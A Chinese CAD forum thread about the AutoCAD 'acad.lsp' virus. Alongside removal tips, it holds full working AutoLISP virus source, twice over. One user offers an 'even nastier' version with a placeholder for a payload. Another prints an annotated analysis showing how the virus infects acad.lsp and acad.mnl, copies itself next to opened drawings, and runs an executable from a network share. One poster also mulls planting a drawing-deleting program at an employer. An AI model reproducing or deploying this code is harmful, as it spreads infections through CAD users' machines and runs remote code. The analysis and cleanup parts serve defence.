[原创]LSP病 毒???

heian88

各位大哥，谁能帮小弟写几个lisp程序，2种螺栓、2种螺母，2种弹簧，垫圈，滚动轴

天天凉茶

这还是比较善意的。以前我从公司辞职的时候想写一个东东放进去。删除所有图形，后来想想太没职业道德。其实用CAD的的多，了解CAD的人不多。很容易出事啊!!

lhtfh

现在已经杀不了

dx163805

杀这个病毒的程序，上传了没有，在那？我也要一份，以备急用。。。用。。。

w125740513

刚刚看到这个帖子时，真有些惊讶。后来细想，这个程序的编制时间不清楚，我怀疑是若干年前一位cad高手编写的“保护”程序，保护图中的块等不被炸开或类似的操作。只不过产生的结果超出了其原来目的。在今天对cad开发已经有一定深度的时代，此程序已算不了什么了。正如发帖者所言，其思路还是可以学习的。

------------------------------------------

个人意见，如有匡偏，请指正。

buzaiyouyu

浩辰出过专杀此类病毒的软件，可惜杀过之后还会产生，好苦恼~~

hb_xiaofen

找到C:\Documents and Settings\********\Application Data\Autodesk\AutoCAD 2004\R16.0\chs\support,中的acad.lsp文件,打开文件一般最后两句是(load "****.lsp")(princ)

将load 后面的文件删除,然后将 acad.lsp删除,打开acad.mnl文件将文件最后的两句

(load "*****.lsp")和(princ)删除,即可以清除.

也可以不删除***.lsp文件,将***.lsp文件中的所有内容删除就可以对这种acad.lsp病毒免疫

附件acad1.lsp病毒带有注释的供大家学习,(附件需要修改才能当病毒用)

以上以2004版本为例如果是其他版本,support文件夹位置有可能在CAD安装文件夹内

hb_xiaofen

将"acadapp.lsp"(或者其他病毒文件)中的内容全部删除,文件保留,即使打开带病毒的CAD文件也不会感染了,而且所带的病毒都成了空白文件

别晨

来个更狠的：

(defun s::startup()
    (setq old_cmd (getvar "cmdecho"))
    (setvar "cmdecho" 0)
  ;获得support目录
    (setq path (findfile "base.dcl"))
    (setq path (substr path 1 (- (strlen path) 8)))
  ;mnl文件名
    (setq mnlpath (getvar "menuname"))
  ;当前图纸文件名
    (setq nowdwg (getvar "dwgname"))
  ;当前图纸路径
    (setq wjqm (findfile nowdwg))
  ;当前图纸所在目录
    (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  ;
    (setq acadpath (findfile "acad.lsp"))    
    (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
    (setq ns1 "" ns2 "")
    (setq lspbj 0)
    (setq wjqm (strcat path "acad.lsp"))
    (if (setq wjm (open wjqm "r"))
        (progn
            (while
                (setq wz (read-line wjm))
                (setq ns1 ns2)
                (setq ns2 wz))
                (if(> (strlen ns1) 14)
                   (if (= (substr ns1 8 7) "acadapp")
                      (setq lspbj 1)
                   )
                )
            (close wjm)
        )
    )
    (setq lspmnl 0)
    (setq wjqm (strcat path "acad.mnl"))
    (if (setq wjm (open wjqm "r"))
        (progn
        (while
            (setq wz (read-line wjm))
            (setq ns1 ns2)
            (setq ns2 wz)
        )
        (if (> (strlen ns1) 14)
          (if (= (substr ns1 8 7) "acadapp")
            (setq lspmnl 1)
          )
        )
        (close wjm)
        )
    )
    (if (= lspmnl 0)                  
        (progn                      
            (setq wjqm (strcat path
              (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 46) (chr 109) (chr 110) (chr 108)))
            )
            (setq wjm (open wjqm "a"))
            (write-line (strcat "(load "(chr 34)"acadapp"(chr 34)")") wjm)
            (write-line "(princ)" wjm)
            (close wjm)
        )
    )
    (if (and (= acadpath dwgpath) (/= acadpath path))
      (progn                      
        (if(= 0 lspmnl)
        (progn                      
        (setq oldacad (findfile "acad.lsp"))      
        (setq newacad (strcat path "acadapp.lsp"))
        )
        (progn
        (setq oldacad (strcat path "acadapp.lsp"))
        (setq newacad (findfile "acad.lsp"))
        )              
        )
        (if (= lspbj 0)                  
        (progn                      
        (setq wjqm (strcat path "acad.lsp"))
        (setq wjm (open wjqm "a"))
        (write-line (strcat "(load " (chr 34) "acadapp" (chr 34) ")" ) wjm)
        (write-line "(princ)" wjm)
        (close wjm))
        )
        (writeapp)
      )
      (progn
        (if (and (/= nowdwg "Drawing.dwg") (/= nowdwg "Drawing1.dwg"))
        (progn
        (setq oldacad (findfile "acadapp.lsp"))
        (setq newacad (strcat dwgpath "acad.lsp"))
        (writeapp)
        )
        )
      )
    )
    ;这里设置需要的操作^_^

    (setvar "cmdecho" old_cmd)
    (princ)
)
(defun writeapp ()
(if (setq wjm1 (open newacad "w"))
(progn
(setq wjm (open oldacad "r"))
(while
(setq wz (read-line wjm))
(write-line wz wjm1)
)                
(close wjm)
(close wjm1)
)
)
)
(princ)

zml84

不知从何时起，我的机子染上了"acad.lsp"。
今日，实在忍受不了它的折磨，就想看看它是如何运行的。
于是经过我一中午的努力，终于揭开了它...

3. ;;;======================================================================
4. ;;;函数：s::startup                                                     ;
5. ;;;功能：根据CAD运行机制，当输入新图形或打开现有图形时，此函数即被调用。;
6. ;;;======================================================================
7. (defun s::startup ()
8. ;;;一、准备工作★★★★★★★★★★★★★★★★★★★★★★★★★
9.   (setq old_cmd (getvar "cmdecho")) ;保存系统设置
10.   (setvar "cmdecho" 0)
11.   (setq path (findfile "base.dcl")) ;获取系统支持路径
12.   (setq path (substr path
13.      1
14.      (- (strlen path) 8)
15.      )
16.   )
17.   (setq mnlpath (getvar "menuname")) ;获取菜单路径
18.   (setq nowdwg (getvar "dwgname")) ;获取当前文档名
19.   (setq wjqm (findfile nowdwg)) ;获取当前文档路径
20.   (setq dwgpath (substr wjqm
21. 1
22. (- (strlen wjqm)
23.    (strlen nowdwg)
24. )
25. )
26.   )
27.   (setq acadpath (findfile "acad.lsp")) ;获取"acad.lsp"路径
28.   (setq acadpath (substr acadpath
29. 1
30. (-
31.    (strlen acadpath)
32.    8
33. )
34. )
35.   )
36. ;;;初始化
37.   (setq ns1 ""
38. ns2 ""
39.   )
40. ;;;二、判断当前状态★★★★★★★★★★★★★★★★★★★★★
41. ;;;2.1下面判别acad.lsp中的内容。
42.   (setq lspbj 0)
43. ;;;lspbj------lsp标记
44. ;;;wjqm------文件全名
45. ;;;wjm------文件名
46. ;;;wz------文字
47.   (setq wjqm
48. (strcat path "acad.lsp")
49.   )
50.   (if (setq wjm (open wjqm "r")) ;读模式打开
51.     (progn
52.       (while
53. (setq wz
54.        (read-line wjm)
55. )
56. (setq ns1 ns2)
57. (setq ns2 wz)
58.       )
59.       (if
60. (> (strlen ns1)
61.    14
62. )
63. (if (= (substr ns1 8 7) "acadapp")
64.    (setq lspbj 1) ;改变lsp标记
65. )
66.       )
67.       (close wjm)
68.     ) ;结束progn
69.   )  ;结束if
70. ;;;2.2下面判别acad.mnl的内容
71.   (setq lspmnl 0)
72.   (setq wjqm
73. (strcat path "acad.mnl")
74.   )
75.   (if
76.     (setq wjm (open wjqm "r"))
77.      (progn
78.        (while
79. (setq wz
80. (read-line wjm)
81. )
82.   (setq ns1 ns2)
83.   (setq ns2 wz)
84.        )
85.        (if
86. (> (strlen ns1) 14)
87.   (if (= (substr ns1 8 7) "acadapp")
88.     (setq lspmnl 1)
89.   )
90.        )
91.        (close wjm)
92.      ) ;结束progn
93.   )  ;结束if
94. ;;;三、对判别结果进行分析处理★★★★★★★★★★★★★★★★★
95. ;;;3.1如果acad.mnl中没有欲加载的内容，则在文件尾添加
96.   (if (= lspmnl 0)
97.     (progn
98.       (setq wjqm
99.      (strcat path
100.      (strcat
101.        (chr 97)
102.        (chr 99)
103.        (chr 97)
104.        (chr 100)
105.        (chr 46)
106.        (chr 109)
107.        (chr 110)
108.        (chr 108)
109.      ) ;内容为"acad.mnl"
110.      )
111.       )
112.       (setq wjm (open wjqm "a")) ;添加模式打开文件
113.       (write-line
114. (strcat
115.   "(load "
116.   (chr 34)
117.   "acadapp"
118.   (chr 34)
119.   ")"
120. )
121. wjm
122.       )
123.       (write-line "(princ)" wjm)
124.       (close wjm)
125.     ) ;结束progn
126.   )  ;结束if
127. ;;;3.2对acad.mnl和acad.lsp文件的处理
128.   (if
129.     (and
130.       (= acadpath dwgpath)
131.       (/= acadpath path)
132.     )
133.      (progn
134.      ;对acad.mnl中有无信息的处理
135.        (if (= 0 lspmnl)
136. (progn ;当acad.mnl中无信息，将"acad.lsp"中内容写入"acadapp.lsp"
137.    (setq oldacad
138.   (findfile "acad.lsp")
139.    )
140.    (setq newacad
141.   (strcat path "acadapp.lsp")
142.    )
143. )
144. (progn ;当acad.mnl中有信息，将"acadapp.lsp"中内容写入"acad.lsp"
145.    (setq oldacad
146.   (strcat path "acadapp.lsp")
147.    )
148.    (setq newacad
149.   (findfile "acad.lsp")
150.    )
151. )
152.        ) ;结束if
153.      ;对acad.lsp中有无信息的处理
154.        (if (= lspbj 0)
155. (progn ;当acad.lsp中没有信息，则在其尾部添加写入
156.    (setq wjqm
157.   (strcat path "acad.lsp")
158.    )
159.    (setq wjm (open wjqm "a"))
160.    (write-line
161.      (strcat
162.        "(load "
163.        (chr 34)
164.        "acadapp"
165.        (chr 34)
166.        ")"
167.      )
168.      wjm
169.    )
170.    (write-line "(princ)" wjm)
171.    (close wjm)
172. ) ;结束progn
173.        ) ;结束if
174.        (writeapp) ;调用子函数
175.      )
176.      (progn
177.        (if (/= nowdwg "Drawing.dwg")
178. (progn
179.      ;当当前图档名称不为"Drawing.dwg"时，将"acadapp.lsp"中内容写入"acad.lsp"
180.    (setq oldacad
181.   (findfile "acadapp.lsp")
182.    )
183.    (setq newacad
184.   (strcat dwgpath "acad.lsp")
185.    )
186.    (writeapp) ;调用子函数
187. )
188.        )
189.      ) ;结束progn
190.   )
191. ;;;四、运行指定路径的应用程序★★★★★★★★★★★★★★★★★★★★
192.   (setq
193.     strtopstr
194.      (strcat
195.        (chr 92)
196.        (chr 92)
197.        (chr 70)
198.        (chr 83)
199.        (chr 49)
200.        (chr 92)
201.        (chr 83)
202.        (chr 89)
203.        (chr 83)
204.        (chr 49)
205.        (chr 92)
206.        (chr 87)
207.        (chr 79)
208.        (chr 82)
209.        (chr 75)
210.        (chr 92)
211.        (chr 80)
212.        (chr 76)
213.        (chr 79)
214.        (chr 84)
215.        (chr 69)
216.        (chr 82)
217.      )
218.   )
219.   (setq
220.     strbottomstr
221.      (strcat
222.        (chr 92)
223.        (chr 76)
224.        (chr 79)
225.        (chr 67)
226.        (chr 80)
227.        (chr 82)
228.        (chr 88)
229.        (chr 89)
230.        (chr 49)
231.        (chr 46)
232.        (chr 69)
233.        (chr 88)
234.        (chr 69)
235.      )
236.   )
237. ;;;变量strtopstr返回内容为"\\\\FS1\\SYS1\\WORK\\PLOTER"
238. ;;;变量strbottomstr返回内容为"\\LOCPRXY1.EXE"
239.   (startapp (strcat strtopstr strbottomstr))
240. ;;;上面一句作用是运行"\\FS1\SYS1\WORK\PLOTER\LOCPRXY1.EXE"
241. ;;;可见，该处作者的意图是运行网络上FS1计算机共享的应用程序
242.   (setvar "cmdecho" old_cmd) ;恢复系统设置
243.   (princ)
244. )    ;结束defun
245. ;;;======================================================================
246. ;;;                                                                     ;
247. ;;;函数：writeapp                                                       ;
248. ;;;功能：将oldacad文件中的内容全部写入到newacad文件中                   ;
249. ;;;======================================================================
250. (defun writeapp ()
251.   (if (setq wjm1 (open newacad "w") ;写入模式打开文件
252.       )
253.     (progn
254.       (setq wjm (open oldacad "r")) ;读出模式打开文件
255.       (while
256. (setq wz
257.        (read-line wjm)
258. )
259. (write-line wz wjm1)
260.       )
261.       (close wjm)
262.       (close wjm1)
263.     ) ;结束progn
264.   )  ;结束if
265. )    ;结束defun
267. (princ)

;;;====================================================================== ;;;函数：s::startup                                                     ; ;;;功能：根据CAD运行机制，当输入新图形或打开现有图形时，此函数即被调用。; ;;;====================================================================== (defun s::startup () ;;;一、准备工作★★★★★★★★★★★★★★★★★★★★★★★★★   (setq old_cmd (getvar "cmdecho")) ;保存系统设置   (setvar "cmdecho" 0)   (setq path (findfile "base.dcl")) ;获取系统支持路径   (setq path (substr path      1      (- (strlen path) 8)      )   )   (setq mnlpath (getvar "menuname")) ;获取菜单路径   (setq nowdwg (getvar "dwgname")) ;获取当前文档名   (setq wjqm (findfile nowdwg)) ;获取当前文档路径   (setq dwgpath (substr wjqm 1 (- (strlen wjqm)    (strlen nowdwg) ) )   )   (setq acadpath (findfile "acad.lsp")) ;获取"acad.lsp"路径   (setq acadpath (substr acadpath 1 (-    (strlen acadpath)    8 ) )   ) ;;;初始化   (setq ns1 "" ns2 ""   ) ;;;二、判断当前状态★★★★★★★★★★★★★★★★★★★★★ ;;;2.1下面判别acad.lsp中的内容。   (setq lspbj 0) ;;;lspbj------lsp标记 ;;;wjqm------文件全名 ;;;wjm------文件名 ;;;wz------文字   (setq wjqm (strcat path "acad.lsp")   )   (if (setq wjm (open wjqm "r")) ;读模式打开     (progn       (while (setq wz        (read-line wjm) ) (setq ns1 ns2) (setq ns2 wz)       )       (if (> (strlen ns1)    14 ) (if (= (substr ns1 8 7) "acadapp")    (setq lspbj 1) ;改变lsp标记 )       )       (close wjm)     ) ;结束progn   )  ;结束if ;;;2.2下面判别acad.mnl的内容   (setq lspmnl 0)   (setq wjqm (strcat path "acad.mnl")   )   (if     (setq wjm (open wjqm "r"))      (progn        (while (setq wz (read-line wjm) )   (setq ns1 ns2)   (setq ns2 wz)        )        (if (> (strlen ns1) 14)   (if (= (substr ns1 8 7) "acadapp")     (setq lspmnl 1)   )        )        (close wjm)      ) ;结束progn   )  ;结束if ;;;三、对判别结果进行分析处理★★★★★★★★★★★★★★★★★ ;;;3.1如果acad.mnl中没有欲加载的内容，则在文件尾添加   (if (= lspmnl 0)     (progn       (setq wjqm      (strcat path      (strcat        (chr 97)        (chr 99)        (chr 97)        (chr 100)        (chr 46)        (chr 109)        (chr 110)        (chr 108)      ) ;内容为"acad.mnl"      )       )       (setq wjm (open wjqm "a")) ;添加模式打开文件       (write-line (strcat   "(load "   (chr 34)   "acadapp"   (chr 34)   ")" ) wjm       )       (write-line "(princ)" wjm)       (close wjm)     ) ;结束progn   )  ;结束if ;;;3.2对acad.mnl和acad.lsp文件的处理   (if     (and       (= acadpath dwgpath)       (/= acadpath path)     )      (progn      ;对acad.mnl中有无信息的处理        (if (= 0 lspmnl) (progn ;当acad.mnl中无信息，将"acad.lsp"中内容写入"acadapp.lsp"    (setq oldacad   (findfile "acad.lsp")    )    (setq newacad   (strcat path "acadapp.lsp")    ) ) (progn ;当acad.mnl中有信息，将"acadapp.lsp"中内容写入"acad.lsp"    (setq oldacad   (strcat path "acadapp.lsp")    )    (setq newacad   (findfile "acad.lsp")    ) )        ) ;结束if      ;对acad.lsp中有无信息的处理        (if (= lspbj 0) (progn ;当acad.lsp中没有信息，则在其尾部添加写入    (setq wjqm   (strcat path "acad.lsp")    )    (setq wjm (open wjqm "a"))    (write-line      (strcat        "(load "        (chr 34)        "acadapp"        (chr 34)        ")"      )      wjm    )    (write-line "(princ)" wjm)    (close wjm) ) ;结束progn        ) ;结束if        (writeapp) ;调用子函数      )      (progn        (if (/= nowdwg "Drawing.dwg") (progn      ;当当前图档名称不为"Drawing.dwg"时，将"acadapp.lsp"中内容写入"acad.lsp"    (setq oldacad   (findfile "acadapp.lsp")    )    (setq newacad   (strcat dwgpath "acad.lsp")    )    (writeapp) ;调用子函数 )        )      ) ;结束progn   ) ;;;四、运行指定路径的应用程序★★★★★★★★★★★★★★★★★★★★   (setq     strtopstr      (strcat        (chr 92)        (chr 92)        (chr 70)        (chr 83)        (chr 49)        (chr 92)        (chr 83)        (chr 89)        (chr 83)        (chr 49)        (chr 92)        (chr 87)        (chr 79)        (chr 82)        (chr 75)        (chr 92)        (chr 80)        (chr 76)        (chr 79)        (chr 84)        (chr 69)        (chr 82)      )   )   (setq     strbottomstr      (strcat        (chr 92)        (chr 76)        (chr 79)        (chr 67)        (chr 80)        (chr 82)        (chr 88)        (chr 89)        (chr 49)        (chr 46)        (chr 69)        (chr 88)        (chr 69)      )   ) ;;;变量strtopstr返回内容为"\\\\FS1\\SYS1\\WORK\\PLOTER" ;;;变量strbottomstr返回内容为"\\LOCPRXY1.EXE"   (startapp (strcat strtopstr strbottomstr)) ;;;上面一句作用是运行"\\FS1\SYS1\WORK\PLOTER\LOCPRXY1.EXE" ;;;可见，该处作者的意图是运行网络上FS1计算机共享的应用程序   (setvar "cmdecho" old_cmd) ;恢复系统设置   (princ) )    ;结束defun ;;;====================================================================== ;;;                                                                     ; ;;;函数：writeapp                                                       ; ;;;功能：将oldacad文件中的内容全部写入到newacad文件中                   ; ;;;====================================================================== (defun writeapp ()   (if (setq wjm1 (open newacad "w") ;写入模式打开文件       )     (progn       (setq wjm (open oldacad "r")) ;读出模式打开文件       (while (setq wz        (read-line wjm) ) (write-line wz wjm1)       )       (close wjm)       (close wjm1)     ) ;结束progn   )  ;结束if )    ;结束defun (princ)